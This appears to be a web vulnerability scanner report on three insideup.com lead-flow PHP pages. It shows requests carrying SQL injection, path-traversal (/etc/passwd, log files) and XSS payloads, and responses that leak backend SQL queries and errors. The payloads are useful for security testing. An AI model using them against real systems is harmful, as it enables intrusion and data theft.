'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=boqvj6hsv96bp1caprojf29gd0; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/lgds00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iig5diisqul3olm4irsljndr42; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/phsy00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=livvdcbe19llto6escv9d5ssf3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select 
